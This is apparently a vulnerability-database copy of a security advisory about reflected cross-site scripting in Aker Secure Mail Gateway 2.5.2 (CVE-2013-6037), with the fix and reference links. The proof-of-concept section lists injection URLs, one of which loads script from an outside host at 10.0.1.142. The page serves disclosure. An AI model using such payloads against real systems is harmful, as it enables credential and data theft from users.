Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormWilliam CostaPACKETSTORM:125599
HistoryMar 07, 2014 - 12:00 a.m.

AKER Secure Mail Gateway 2.5.2 Cross Site Scripting

2014-03-0700:00:00
William Costa
packetstormsecurity.com
31

0.002 Low

EPSS

Percentile

53.2%

JSON
`XSS in url for access of Confirmation Required in box for antispam from  
company AKER (CVE-2013-6037)  
  
I. VULNERABILITY  
-------------------------  
Reflected XSS vulnerabilities in AKER SECURE MAIL GATEWAY <= v2.5.2  
  
II. BACKGROUND  
-------------------------  
The Aker Secure Mail Gateway is a complete platform security e-mail  
  
III. DESCRIPTION  
-------------------------  
Has been detected a reflected XSS vulnerability in Aker Secure Mail Gateway  
<=2.5.2 , that allows the execution of arbitrary HTML/script code to be  
executed in the context of the victim user's browser.  
The code injection is done through the parameter "msg_id" and "content" in  
the page index.php.  
  
  
IV. PROOF OF CONCEPT  
-------------------------  
The application does not validate the double encoding of the "msg_id"  
parameter correctly. Malicious Request ("msg_id")  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script>alert(String(/XSS/).substr(1,6)  
); </script>  
Vulnerable:  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script  
src=http://10.0.1.142:5005/xook.js></script>  
Vulnerable:  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><iframe  
src=http://www.google.com> </iframe>  
  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser, this can leverage to steal sensitive information as user  
credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Aker Secure Mail Gateway <= v2.5.2  
  
VII. SOLUTION  
-------------------------  
http://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp  
  
References  
  
http://www.kb.cert.org/vuls/id/687278  
http://www.aker.com.br/  
http://www.aker.com.br/produtos/aker-secure-mail-gateway  
http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All  
  
By Wiliam Costa  
`

Related

cert 1
openvas 1
seebug 1
cvelist 1
cve 1
nvd 1
prion 1
cert
cert
Aker Secure Mail Gateway reflected XSS vulnerability
2014-03-06 00:00:00
openvas
openvas
Aker Secure Mail Gateway Cross-Site Scripting Vulnerability
2014-03-17 00:00:00
seebug
seebug
Aker Secure Mail Gateway &quot;msg_id&quot;跨站脚本漏洞
2014-03-10 00:00:00
cvelist
cvelist
CVE-2013-6037
2014-03-11 01:00:00
cve
cve
CVE-2013-6037
2014-03-11 13:01:03
nvd
nvd
CVE-2013-6037
2014-03-11 13:01:03
prion
prion
Cross site scripting
2014-03-11 13:01:00

0.002 Low

EPSS

Percentile

53.2%

JSON
Related for PACKETSTORM:125599
cert1openvas1seebug1cvelist1cve1nvd1prion1